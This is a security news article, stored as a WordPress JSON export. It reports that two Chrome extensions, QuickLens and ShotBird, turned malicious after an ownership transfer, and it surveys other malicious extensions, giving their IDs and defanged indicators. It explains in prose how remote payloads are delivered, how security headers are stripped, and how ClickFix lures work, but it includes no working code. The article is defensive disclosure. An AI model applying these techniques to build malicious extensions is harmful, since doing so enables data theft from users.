{"id":196,"date":"2026-03-09T10:56:01","date_gmt":"2026-03-09T10:56:01","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=196"},"modified":"2026-03-09T10:56:01","modified_gmt":"2026-03-09T10:56:01","slug":"chrome-extension-turns-malicious-after-ownership-transfer-enabling-code-injection-and-data-theft","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=196","title":{"rendered":"Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft"},"content":{"rendered":"<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgH49NW0X18R8bc0fzFm6aPt92f15pxPq-HLMfyFmsApiXvZEsCn4z9qNQErHHvW34SFXKUPWy7mK70hM06Ld6Cxa4DioW7xjV9jnMamMF3DDKIQ39VwJhvq7l4bO79yzGp8huA6ewRk-XdWvJSeYT8fs16PdOa9BSxdbzw0hIwC1PVxh9uY5L0Wx3nNMAL\/s1700-e365\/chrome-malware.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><\/a><\/div>\n<p>Two Google Chrome extensions have turned malicious after what appears to be a case of <a href=\"https:\/\/x.com\/tuckner\/status\/2027416172442853830\" rel=\"noopener\" target=\"_blank\">ownership transfer<\/a>, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data.<\/p>\n<p>The extensions in question, both originally associated with a developer named \u00abakshayanuonline@gmail.com\u00bb (BuildMelon), are listed below &#8211;<\/p>\n<ul>\n<li>QuickLens &#8211; Search Screen with Google Lens (ID: kdenlnncndfnhkognokgfpabgkgehodd) &#8211; 7,000 users<\/li>\n<li>ShotBird &#8211; Scrolling Screenshots, Tweet Images &amp; Editor (ID: gengfhhkjekmlejbhmmopegofnoifnjp) &#8211; 800 users<\/li>\n<\/ul>\n<p>While QuickLens is no longer available for download from the Chrome Web Store, ShotBird remains accessible as of writing. ShotBird was <a href=\"https:\/\/www.reddit.com\/r\/chrome_extensions\/comments\/1gkv28r\/free_say_hello_to_shotbird_make_better\/\" rel=\"noopener\" target=\"_blank\">originally launched<\/a> in November 2024, with its developer, Akshay Anu S (@AkshayAnuOnline), <a href=\"https:\/\/x.com\/AkshayAnuOnline\/status\/1854777234541642035\" rel=\"noopener\" target=\"_blank\">claiming<\/a> on X that the extension is suitable for \u00abcreating professional, studio-like visuals,\u00bb and that all processing happens locally.<\/p>\n<p>According to <a href=\"https:\/\/monxresearch-sec.github.io\/shotbird-extension-malware-report\/\" rel=\"noopener\" target=\"_blank\">research<\/a> published by monxresearch-sec, the browser add-on received a \u00abFeatured\u00bb flag in January 2025, before it was passed on to a different developer (\u00abloraprice198865@gmail.com\u00bb) sometime last month.<\/p>\n<p>In a similar vein, QuickLens was listed for sale on ExtensionHub on October 11, 2025, by \u00abakshayanuonline@gmail.com\u00bb merely two days after it was published, Annex Security&#8217;s John Tuckner <a href=\"https:\/\/annex.security\/blog\/pixel-perfect\/\" rel=\"noopener\" target=\"_blank\">said<\/a>. On February 1, 2026, the extension&#8217;s owner changed to \u00absupport@doodlebuggle.top\u00bb on the Chrome Web Store listing page.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/not-fast-enough-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhlXM830ruQd2xT6M7JNeNRjaFa1onD12WjSCHihTFMTzbyfT9h-irPmXy_h3E1HGSs6sdv7FTmnyNVTM5kmSb7BuUtZe8gKoTQt99P1sSzRcqqXpOJP6eoAOhR3DGb6qHx9kOZ_HBZUMmVnsnd0DM7QfUp81bgzTvvgLww6oqB-EhnDfWXH5pWCYhAsyLs\/s728-e100\/tl-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>The malicious update introduced to QuickLens on February 17, 2026, kept the original functionality but introduced capacities to strip security headers (e.g., X-Frame-Options) from every HTTP response, allowing malicious scripts injected into a web page to make arbitrary requests to other domains, bypassing Content Security Policy (<a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Guides\/CSP\" rel=\"noopener\" target=\"_blank\">CSP<\/a>) protections.<\/p>\n<p><a name=\"more\"\/><\/p>\n<p>In addition, the extension contained code to fingerprint the user&#8217;s country, detect the browser and operating system, and polls an external server every five minutes to receive JavaScript, which is stored in the browser&#8217;s local storage and executed on every page load by adding a hidden 1\u00d71 GIF <img\/> element and setting the JavaScript string as its \u00abonload\u00bb attribute. This, in turn, causes the malicious code to be executed once the image is loaded.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgtbNVFQArInH_tIqk1dHv8QtD4RMtEkzUjgiEzaxf4z0lmK6RcYoKLyd9KlMLtR3pXGvE4vJEaO046ysdQwH7zP0-1R9WqRMYBEsTgTbDk6tINfKUZ4R9W7Klf38B5DvTduvDARTerx7w9IEZ8PCu0ytRoPVr9nu6Vxzngv2PrndHNlMz5f6C28dfZCaya\/s1700-e365\/short.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgtbNVFQArInH_tIqk1dHv8QtD4RMtEkzUjgiEzaxf4z0lmK6RcYoKLyd9KlMLtR3pXGvE4vJEaO046ysdQwH7zP0-1R9WqRMYBEsTgTbDk6tINfKUZ4R9W7Klf38B5DvTduvDARTerx7w9IEZ8PCu0ytRoPVr9nu6Vxzngv2PrndHNlMz5f6C28dfZCaya\/s1700-e365\/short.png\" alt=\"\" border=\"0\" data-original-height=\"717\" data-original-width=\"1453\"\/><\/a><\/div>\n<p>\u00abThe actual malicious code never appears in the extension&#8217;s source files,\u00bb Tuckner explained. \u00abStatic analysis shows a function that creates image elements. That&#8217;s it. The payloads are delivered from the C2 and stored in local storage &#8212; they only exist at runtime.\u00bb<\/p>\n<p>A similar analysis of the ShotBird extension by monxresearch-sec has uncovered the use of direct callbacks to deliver JavaScript code instead of creating a 1&#215;1 pixel image to trigger the execution. The JavaScript is engineered to display a bogus Google Chrome browser update prompt, clicking which users are served a ClickFix-style page to open the Windows Run dialog, launch \u00abcmd.exe,\u00bb and paste a PowerShell command, resulting in the download of an executable named \u00abgoogleupdate.exe\u00bb on Windows hosts.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEghw5aOSEwX7E3oTaco23HX_tRAaOQWXAv5il2MoG38psjlOR7Nct0E4393oLqMRE9snrm60Cl1laVyqL9MTgnH3R1sBPaq1CQuLW4yPoOALBlZ2NVLFZC3UF9HNUsuylPVxzf2QBeM00bRKoHSaNs0zVXbhibhq68M3zfgaGamUcTuIuQv66gfyVEA7i8z\/s1700-e365\/supply.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEghw5aOSEwX7E3oTaco23HX_tRAaOQWXAv5il2MoG38psjlOR7Nct0E4393oLqMRE9snrm60Cl1laVyqL9MTgnH3R1sBPaq1CQuLW4yPoOALBlZ2NVLFZC3UF9HNUsuylPVxzf2QBeM00bRKoHSaNs0zVXbhibhq68M3zfgaGamUcTuIuQv66gfyVEA7i8z\/s1700-e365\/supply.png\" alt=\"\" border=\"0\" data-original-height=\"1952\" data-original-width=\"2202\"\/><\/a><\/div>\n<p>The malware then proceeds to hook input, textarea, select HTML elements, and capture any data entered by the victim. This could include credentials, PIN, card details, tokens, and government identifiers. It&#8217;s also equipped to siphon data stored in the Chrome web browser, such as passwords, browsing history, and extension-related information.<\/p>\n<p>\u00abThis is a two-stage abuse chain: extension-side remote browser control plus host-level execution pivot via fake updates,\u00bb the researcher said. \u00abThe result is high-risk data exposure in-browser and confirmed host-side script execution on at least one affected system. In practical terms, this elevates the impact from browser-only abuse to likely credential theft and broader endpoint compromise.\u00bb<\/p>\n<p>It&#8217;s assessed that the same threat actor is behind the compromise of the two extensions and is operating such add-ons in parallel, given the use of an identical command-and-control (C2) architecture pattern, ClickFix lures injected into the browsing context, and ownership transfer as an infection vector.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiPooBnA_BkLKvWR7VnMPD1tAnk4ionaZ-EEKjpOlhyphenhyphenU9htgxvrnhocDSplm6DYEjgCRD6ouBSDJr_0kn61JnHfrCBaZRD3-fwDqcHgLwpaXsJdTAdAhJhjjrYXVRGrwdib54XE-G_H-kVVzY5QNE1vRrRXNFXo1kU5zGJh7ml7AVYfPWBsAlH-x06nk5dc\/s1700-e365\/chrome-malware.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiPooBnA_BkLKvWR7VnMPD1tAnk4ionaZ-EEKjpOlhyphenhyphenU9htgxvrnhocDSplm6DYEjgCRD6ouBSDJr_0kn61JnHfrCBaZRD3-fwDqcHgLwpaXsJdTAdAhJhjjrYXVRGrwdib54XE-G_H-kVVzY5QNE1vRrRXNFXo1kU5zGJh7ml7AVYfPWBsAlH-x06nk5dc\/s1700-e365\/chrome-malware.png\" alt=\"\" border=\"0\" data-original-height=\"1536\" data-original-width=\"2716\"\/><\/a><\/div>\n<p>Interestingly, the original extension developer has <a href=\"https:\/\/chromewebstore.google.com\/detail\/radial-new-tab\/fogdlfdfpjlpmpmnmeepffaikefkacnc\" rel=\"noopener\" target=\"_blank\">published<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/reditop-%E2%80%93-scroll-to-top-f\/gddonialdhbldcdbnbloangmjnpcnhhd\" rel=\"noopener\" target=\"_blank\">several<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/audiomatch-youtube-audio\/mejaghdgnidejbeofmfhnogbniipdjge\" rel=\"noopener\" target=\"_blank\">other<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/sidewiki-%E2%80%93-sidebar-for-wi\/ofifhmaojnmphodmgkipjpjedgnhkbhl\" rel=\"noopener\" target=\"_blank\">extensions<\/a> under their name on the Chrome Web Store, and all of them have received a Featured badge. The developer also has an <a href=\"https:\/\/www.extensionhub.io\/akshayanu\" rel=\"noopener\" target=\"_blank\">account on ExtensionHub<\/a>, although no extensions are currently listed for sale. What&#8217;s more, the individual has <a href=\"https:\/\/www.reddit.com\/r\/DomainsForSale\/comments\/1r710f3\/aiinfrastackcom_domain_for_sale_2500\/\" rel=\"noopener\" target=\"_blank\">attempted<\/a> to sell domains like \u00abAIInfraStack[.]com\u00bb for $2,500, stating the \u00abstrong keyword domain\u00bb is \u00abrelevant for [sic] rapidly growing AI ecosystem.\u00bb<\/p>\n<p>\u00abThis is the extension supply chain problem in a nutshell,\u00bb Annex Security said. \u00abA &#8216;Featured,&#8217; reviewed, functional extension changes hands, and the new owner pushes a weaponized update to every existing user.\u00bb<\/p>\n<p>The disclosure comes as Microsoft warned of the malicious Chromium\u2011based browser extensions that masquerade as legitimate AI assistant tools to harvest LLM chat histories and browsing data.<\/p>\n<p>\u00abAt scale, this activity turns a seemingly trusted productivity extension into a persistent data collection mechanism embedded in everyday enterprise browser usage, highlighting the growing risk browser extensions pose in corporate environments,\u00bb the Microsoft Defender Security Research Team <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/05\/malicious-ai-assistant-extensions-harvest-llm-chat-histories\/\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>In recent weeks, threat hunters have also flagged a malicious Chrome extension named lm\u03a4oken Chromophore (ID: bbhaganppipihlhjgaaeeeefbaoihcgi) that impersonates imToken while advertising itself as a hex color visualizer in the Chrome Web Store to steal cryptocurrency seed phrases using phishing redirects.<\/p>\n<p>\u00abInstead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it,\u00bb Socket researcher Kirill Boychenko <a href=\"https:\/\/socket.dev\/blog\/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>\u00abOn install, the extension fetches a destination URL from a hardcoded JSONKeeper endpoint (jsonkeeper[.]com\/b\/KUWNE) and opens a tab pointing to a lookalike Chrome Web Store-style domain, chroomewedbstorre-detail-extension[.]com. The landing page impersonates imToken using mixed-script homoglyphs and funnels victims into credential-capture flows that request either a 12 or 24-word seed phrase or a private key.\u00bb<\/p>\n<p>Other malicious extensions <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-20-%20AI-Accelerated%20Malicious%20Chrome%20Extension%20Campaigns.txt\" rel=\"noopener\" target=\"_blank\">flagged<\/a> by Palo Alto Networks Networks Unit 42 have been found to engage in affiliate hijacking and data exfiltration, with one of them \u2013 Chrome MCP Server &#8211; AI Browser Control (ID: fpeabamapgecnidibdmjoepaiehokgda) \u2013 <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-11-IOCs-for-RAT-disguinsed-as-AI-based-browser-extension.txt\" rel=\"noopener\" target=\"_blank\">serving<\/a> as a full-fledged remote access trojan while masquerading as an AI automation tool using the Model Context Protocol (MCP).<\/p>\n<p>Unit 42 researchers have also revealed that three popular Chrome extensions, namely Urban VPN Proxy, Urban Browser Guard, and Urban Ad Blocker, that were identified by Koi as scraping AI conversations from various chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity, have returned on the Chrome Web Store.<\/p>\n<p>\u00abFollowing the public disclosure of the campaign on December 15, 2025, the developer updated benign versions in January 2026, likely in response to the report,\u00bb researchers Qinge Xie, Nabeel Mohamed, Shresta Bellary Seetharam, Fang Liu, Billy Melicher, and Alex Starov <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-13-IOCs-for-tactics-by-browser-extensions-to-avoid-bans.txt\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>Furthermore, the cybersecurity company identified an extension called Palette Creator (ID: iofmialeiddolmdlkbheakaefefkjokp), which has over 100,000 users and whose previous version communicated with known network indicators associated with a campaign dubbed RedDirection to carry out browser hijacking.<\/p>\n<p>That&#8217;s not all. A new campaign <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-03-09-Threat-Alert-30K-domains-distributing-malicious-AI-related-browser-extension.txt\" rel=\"noopener\" target=\"_blank\">comprising<\/a> over 30,000 domains has been found to initiate a redirect chain to route traffic to a landing page (\u00abansiblealgorithm[.]com\u00bb) that&#8217;s used for distributing a Chrome extension called OmniBar AI Chat and Search (ID: ajfanjhcdgaohcbphpaceglgpgaaohod).<\/p>\n<p>The extension makes use of the chrome_settings_overrides API to alter Chrome settings and set the browser home page to omnibar[.]ai, as well as make the default search provider to a custom URL: \u00abgo.omnibar[.]ai\/?api=omni&amp;sub1=omnibar.ai&amp;q={searchTerms}\u200b\u00bb and track queries via an API parameter.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/fs-report-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjWQgUDT06NQu9vGMPC7BWROmJABTIWg058l7oGKD-v3ZchC8_66xjbclOE9koChsRf5CEKgqrXTVrne_00PdGokh3brhvF-g33I4FYYpTukrvuNQWXZOVAfon6-2axyRoVJ4uOrXPqRhxfZUaJWEm-K9esUS3ql8VSVWAKLqyfhHLgMSXhkMTkcOtGSX7R\/s728-e100\/fs-report-d.png\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>It&#8217;s believed that the end goal is to perform browser-hijacking as part of what seems to be a large-scale affiliate marketing scheme, Unit 42 said, adding it identified two other extensions that exhibit the same browser-hijacking behavior consistent with OmniBar via home page override and search interception &#8211;<\/p>\n<ul>\n<li>AI Output Algo Tool (ID: eeoonfhmbjlmienmmbgapfloddpmoalh)<\/li>\n<li>Serpey.com official extension (ID: hokdpdlchkgcenfpiibjjfkfmleoknkp)<\/li>\n<\/ul>\n<p>A deeper investigation of three more extensions published by the same developer (\u00abjon@status77.com\u00bb and Status 77) has uncovered that two of them track user browsing activity to inject affiliate markers, while a third one extracts and transmits user Reddit comment threads to a developer-controlled API endpoint &#8211;<\/p>\n<ul>\n<li>Care.Sale (ID: jaioobipjdejpeckgojiojjahmkiaihp)<\/li>\n<li>Giant Coupons Official Extension (ID: akdajpomgjgldidenledjjiemgkjcchc)<\/li>\n<li>Consensus &#8211; Reddit Comment Summarizer (ID: mkkfklcadlnkhgapjeejemflhamcdjld)<\/li>\n<\/ul>\n<p>Users who have installed any of the aforementioned extensions are advised to remove them from their browsers with immediate effect, avoid side-loading or installing unverified productivity extensions, and audit browsers for any unknown extensions and uninstall them.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":197,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[182,10,38,524,520,525,33,522,526,523,521],"class_list":["post-196","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-chrome","tag-code","tag-data","tag-enabling","tag-extension","tag-injection","tag-malicious","tag-ownership","tag-theft","tag-transfer","tag-turns"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=196"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/196\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/197"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}